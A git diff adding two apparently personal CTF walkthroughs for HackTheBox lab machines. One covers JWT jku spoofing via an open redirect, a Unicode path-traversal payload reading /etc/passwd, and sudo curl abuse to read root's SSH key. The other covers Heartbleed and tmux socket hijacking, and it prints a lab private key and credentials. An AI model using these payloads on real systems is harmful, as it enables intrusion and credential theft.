diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.png b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png new file mode 100644 index 0000000..819a6cd --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55a5493a3d30da7ec55c1773bd95ebec52c0c143b73334c43576cd68056bb2e1 +size 22349 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp new file mode 100644 index 0000000..f7c77c8 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdb91355291c96759130d44558ddaa6ceaa6cd18b6a49c81f98d0ef85b6f1c2a +size 34580 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.png b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png new file mode 100644 index 0000000..6402cdb --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27fdd71979f347374b853d1f2fdde8c7471ca7682b6008aec987696173f3c676 +size 105639 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp new file mode 100644 index 0000000..67380ca --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:947f486482d5adeddfe69866b87a536253921760c18067a56379f8da1eb31e92 +size 18530 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.png b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png new file mode 100644 index 0000000..4c4f05e --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70b725e86365fb7749186d4da8ed8be2cf1a5fedb472894d985e879f6d1599bc +size 46676 
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp new file mode 100644 index 0000000..56f2a10 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b630a6cb9da2408661d9fbe313f31bb87c0387587c63181185b79c6f3bfc93f +size 13884 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.png b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png new file mode 100644 index 0000000..56b9698 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0095690937b8a93eb85b010030039505185fd63b9cd85926a7d92234effcfcc +size 139343 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp new file mode 100644 index 0000000..8777883 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34dff53eb88d134ede9bb059379c294dba27770c049b4c4065eba4d0ba329a0d +size 60650 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.png b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png new file mode 100644 index 0000000..44698cb --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e47405783afbe203ef272aedc5a8492cae640b077d380a728c30a29392f23fdf +size 42414 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp new file mode 100644 index 0000000..9f7bd3e --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:073d4e30b98e53f70eec7320002834be78f6509868427b5e08eb034bb9ebb2d7 +size 15022 
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.png b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png new file mode 100644 index 0000000..275b8a2 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7de92b0a59ba688c0c5fd2e803e09403f6d49a3e0f49970448ac1e95d12dea7 +size 2830 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp new file mode 100644 index 0000000..5f80472 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e95a319a4ce81a430f4afdba3143e18c68b737b898cba5eba4a20cdd529abe2 +size 2064 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.png b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png new file mode 100644 index 0000000..634d5b6 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b9bd0096ac96e7b35323194368a0b53e1aaa562f42b7a645226380ba4518884 +size 117685 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp new file mode 100644 index 0000000..de75f51 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dca94e3abf286ab940a31dd9e3c0cd4839e4ffa2f7610520c8331f985d0ecb56 +size 92474 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.png b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png new file mode 100644 index 0000000..1739068 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88e61709c2642b5ea5f29aba65ece391ff71ae4870e06e2443907dfa8114e186 +size 24417 
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp new file mode 100644 index 0000000..a9e6cfd --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c03e1f0ef1b66ae13c5fb1adad147e4d3507dcd0a9983e586340044cd1627f1d +size 29608 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.png b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png new file mode 100644 index 0000000..9d320a2 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f62a01de7f9328e336bdf2ad03b381542194d03be2d159f9d9166b767c882d7 +size 277841 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp new file mode 100644 index 0000000..0914410 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5b838c3796fea279b61d6eb1f1078bbb0cc240689c93603051ff64812829787 +size 162568 diff --git a/content/writeup-ctf/writeup-unicode-htb/index.md b/content/writeup-ctf/writeup-unicode-htb/index.md new file mode 100644 index 0000000..e8cdec4 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/index.md 
@@ -0,0 +1,235 @@ +--- +title: "Writeup - Unicode (HTB)" +date: 2022-05-07 +slug: "writeup-unicode-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Unicode](https://app.hackthebox.com/machines/Unicode) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.126 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +Let's start by creating an account on the site. + +![](img/image-3.webp) + +After logging in, you will be taken to the page. + +![](img/image-4.webp) + +By searching a bit you can find a lot of forms, file sending, ... But after having tested them I don't find anything conclusive. + +![](img/image-5.webp) + +![](img/image-6.webp) + +Looking at the cookies generated by the site, I find one: `auth` I try to decode it on JWT.io. + +![](img/image-7.webp) + +So it's a JWT cookie with the RS256 algorithm. I search on google for documentation on this type of cookie and see if there are any exploit. I quickly find the following site: [JWT - JSON Web Tokens](https://hackernoon.com/json-web-tokens-jwt-demystified-f7e202249640). + +In this article we learn that this string is composed of 3 parts encoded in base 64 : + +![](img/image-8.webp) + +- Header: Parameter such as the algorithm, the url of the JSON web key, ... +- Payload: Personalized storage area, in our case the username +- Signature : Hash of the Header+Payload + +We also learn that in the majority of the cases we use asymmetric keys and that in this case the site must host a `jwks` file with the `keys` properties. 
I can get the content of this file with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ curl hackmedia.htb/static/jwks.json +{ + "keys": [ + { + "kty": "RSA", + "use": "sig", + "kid": "hackthebox", + "alg": "RS256", + "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs", + "e": "AQAB" + } + ] +} +``` +At the end of the article we learn one last thing, in general this element is stored in the `header` of the page. But in our case it is in the form of a `cookie`. + +To change the account for the admin account, we will try to do a `JWKS Spoofing`. To do this we will first generate a key pair following the same parameters as the `jwks.json` file we found. For that I use the following site [mkjwk](https://mkjwk.org/). + +![](img/image-9.webp) + +I then create a `jwks.json` file with the same structure as the previous one but with the `n` we just generated. + + +```bash +{ + "keys": [ + { + "kty": "RSA", + "use": "sig", + "kid": "hackthebox", + "alg": "RS256", + "n": "[CHANGE IT]", + "e": "AQAB" + } + ] +} +``` +I then launch a file server with the following command: + + +```bash +python3 -m http.server 80 +``` +Then I start to modify our cookie. First I change the value of `jku` and add the following element: + + +```bash +/../redirect?url=10.10.14.4/jwks.json +``` +Then I add in the `Verify Signature` part the Public/Private key that we have generated. + +Finally I change the variable `user` with the value `admin`. + +![](img/image-10.webp) + +Now that we have our new cookie, I replace the old value with the new one, then refresh the page. I now have access to the admin interface! 
+ +![](img/image-11.webp) + +I look a little at the different parge, I fall on the following link: + + + +It's a link that has an argument, so we should be able to do a Path Traversal exploit. So I try in a first time the following input: + + +```bash +../../../etc/passwd +``` +But unfortunately this results in an error... There is a check that blocks our request. After some research it is known that it is possible to bypass this filtering with a particular encoding of the characters. Thanks to the unicode normalization it is possible to pass the request: + +[Unicode normalization vulnerabilities](https://lazarv.com/posts/unicode-normalization-vulnerabilities/) + +With the following query I can access the file : + + +```bash +︰/︰/︰/︰/︰/︰/︰/etc/passwd +``` +In this file I learn that the `mysql` service is used. Potentially credentials ! + + +```bash +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin +systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin +systemd-timesync:x:102:104:systemd Time 
Synchronization,,,:/run/systemd:/usr/sbin/nologin +messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin +tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false +uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin +tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin +landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin +pollinate:x:110:1::/var/cache/pollinate:/bin/false +usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin +sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd- +coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin +lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false +mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false +code:x:1000:1000:,,,:/home/code:/bin/bash +``` +I then look in the configuration files of nginx, which allows me to find the following file: + + +```bash +mysql_host: "localhost" +mysql_user: "code" +mysql_password: "B3stC0d3r2021@@!" +mysql_db: "user" +``` +I then try to connect with these credentials: + +![](img/image-12.webp) + +I now have a shell as `code` and I can get the first flag. + +## Privilege escalation + +First I look at the sudo permissions I have: + +![](img/image-13.webp) + +I have the right to run the treport `treport` script as root, so I try to run it to see what it does: + +![](img/image-14.webp) + +This script allows to manage files. One option interests me particularly: `Download A Threat Report`. Indeed after having executed it, we can clearly see that the program uses `curl`. So I try to download a local file to see what happens: + +![](img/image-15.webp) + +An error, so there is potentially a validation of the URL... So I look at the doc of the command to see if there is an option that could be useful. + + +```bash +[...] +-K, --config + +Specify a text file to read curl arguments from. 
The command line arguments found in the text file will be used as if they were provided on the command line. +[...] +``` +After a few minutes I find the option `-K`, this option allows to specify a file in which `curl` will go to look for the links to download files. I can try to use this option to see the content of the file... + +![](img/image-16.webp) + +By trying on the id\_rsa file of the root use, I can visualize its content ! So I try to create a local file with the RSA key and then connect via SSH to the root user but without success :( + +To validate the machine, I still look at the content of the `root.txt` file. + +![](img/image-17.webp) + +So I get the last flag, but I didn't get a root shell yet. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the panel to avoid Paht Traversal +- Do not let any program run in root if not necessary diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.png b/content/writeup-ctf/writeup-valentine-htb/featured.png new file mode 100644 index 0000000..cb7316b --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3539d224b2ae4c9faf16e7eefbd5db5288f915caa11b66c1d0b328cd3da03770 +size 269289 diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.webp b/content/writeup-ctf/writeup-valentine-htb/featured.webp new file mode 100644 index 0000000..0bbaea7 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c5bf51d71dd8a680ac73eed3458fdaae437cea2e8dff3630d548f726814ece1 +size 28084 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.png b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png new file mode 100644 index 0000000..b7c3bd9 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68ff38a461c79681e15401af96454c580f030ae3968da880edf1e23b7b2321f6 +size 39360 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp new file mode 100644 index 0000000..9452887 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3c997ba457eea7ffb04774bea53ca0d01134c307de07b251fbf66906ac0d5c1 +size 33826 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.png b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png new file mode 100644 index 0000000..89d484d --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:645689ba3762229e3ac3b0ee77c6a30df680477e1a90851dea4e8ab17c717e61 +size 895817 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp new file mode 100644 index 0000000..e11189f --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10a0d0918ba5ff2534ceb909db11e33865f5ecfc32a83512529232f501c4bbad +size 150720 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.png b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png new file mode 100644 index 0000000..599c535 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0fc9f22b78bebc77dafee88d95e4ded010e95e86289d7b21672994d5f1798ed +size 32583 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp new file mode 100644 index 0000000..93dee62 --- /dev/null 
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29aae3eb38d08045a2218f06365d920f919a878a93c660a9dc8cd8947c3e9c18 +size 31426 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.png b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png new file mode 100644 index 0000000..f0d5bf4 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c23170c73c1e11440241b2d14e8a9cfe6f3331f9285c54e3886dad92722d77fb +size 59010 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp new file mode 100644 index 0000000..d401eab --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83905310fc201e2f000c442386a002dc6ee81330b9bf2c6bb284913c1157a8ea +size 108770 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.png b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png new file mode 100644 index 0000000..404e517 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a31fde59951663b4c54c0aba4d9496f0c393a54f155bade30f8ac8271ac0913 +size 27909 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp new file mode 100644 index 0000000..24a9927 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bf95abcf51df1fec5c201907d013cb229a5e25fe0eef0f3b09f76b8f783fe15 +size 24544 
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.png b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png new file mode 100644 index 0000000..0df870a --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:575bc2165086ffdb3098d3e9046ee6f5eba249b2c768aafbe7136150fd578143 +size 23837 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp new file mode 100644 index 0000000..e23e917 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53ed2715272b57adf75fbf3a3ba2bdb7c33a2a5be90059a5c06cf44b24a24d60 +size 24224 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.png b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png new file mode 100644 index 0000000..de9c5e5 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d5e71b66aceeac99eb0cb00d88bec1947966671d57cb5cd7183af37b4136b7 +size 6645 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp new file mode 100644 index 0000000..dcd5db7 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:929717789379635d89b5e33a89d00233098ebd8c52d6ba51463b6afefd8658cd +size 7834 diff --git a/content/writeup-ctf/writeup-valentine-htb/index.md b/content/writeup-ctf/writeup-valentine-htb/index.md new file mode 100644 index 0000000..82c756a --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/index.md 
@@ -0,0 +1,132 @@ +--- +title: "Writeup - Valentine (HTB)" +date: 2022-05-05 +slug: "writeup-valentine-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Valentine](https://app.hackthebox.com/machines/Valentine) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.79 +``` +Three TCP port are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 5.9p1) +- 80/tcp : HTTP (Apache 2.2.22) +- 443/tcp : HTTPS (Apache 2.2.22) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +I quickly find the `/dev` folder where there are 2 files : + + +```bash +To do: + +1) Coffee. +2) Research. +3) Fix decoder/encoder before going live. +4) Make sure encoding/decoding is only done client-side. +5) Don't use the decoder/encoder until any of this is done. +6) Find a better way to take notes. +``` + +```bash +-----BEGIN RSA PRIVATE KEY----- +Proc-Type: 4,ENCRYPTED +DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 + +DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R +5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 +0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi +Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P +OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd +pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH +QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E +p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC +Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO +t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 +XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK +aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ ++wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E 
+AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q +r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe +2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky +e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP +09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC +dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX +cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY +pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj +Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL +suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW +l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT +RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 +-----END RSA PRIVATE KEY----- +``` +This second file is very interesting, it's an RSA key that should allow me to connect in SSH. The only problem is that it is encrypted and requires a password. So I try to brute force the password. For that I start by extracting a hash with the following command: + + +```bash +ssh2john id_rsa > hash +``` +Then I launch John with the rockyou dictionary. + +![](img/image-3.webp) + +Unfortunately without success. Let's look for something else, after performing a vulnerability scan with Nmap, I find that the machine is vulnerable to CVE-2014-0160. After some research I find this github [github](https://github.com/sensepost/heartbleed-poc). + +![](img/image-4.webp) + +After some executions I find a string in base64: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d +heartbleedbelievethehype +``` +It could be a password, so I test to connect with : + +![](img/image-5.webp) + +I now have SSH access and can retrieve the first flag. + +{{< alert >}} +While trying to connect via SSH I got the following error: `sign_and_send_pubkey: no mutual signature supported`. 
To solve the problem I had to add to the command: `PubkeyAcceptedKeyTypes=+ssh-rsa`. +{{< /alert >}} + +## Privilege escalation + +At first I start by running the [linpeas.sh](https://linpeas.sh) script to find a vulnerability. I quickly find a tmux service executed by root. + +![](img/image-6.webp) + +After some research I find that it is possible to enter a tmux stream via the `-S` argument which allows to indicate a socket-path. + + +```bash +tmux -S /.devs/dev_sess +``` +I now have a root shell and I can get the last flag. + +![](img/image-7.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave large files accessible directly from a website +- Update the machine to fix CVE-2014-0160 +- Do not create a tmux session as root diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.png b/content/writeup-ctf/writeup-watcher-thm/featured.png new file mode 100644 index 0000000..f383377 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f15c28db1b5cb1bd581b2940cdc0760b779d7d1b2501743b3eacca3bf15f9ec +size 135190 diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.webp b/content/writeup-ctf/writeup-watcher-thm/featured.webp new file mode 100644 index 0000000..94cc08c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40a9900a5716a04f308a355321c3bb05731555f3f0ce68cf9297dadbc4b3a5ca +size 87760 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.png b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png new file mode 100644 index 0000000..ac84516 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df357b9331975320a0dde865aa758d73431f76dd63e78ecaa4de23fc442da1d2 +size 37917 
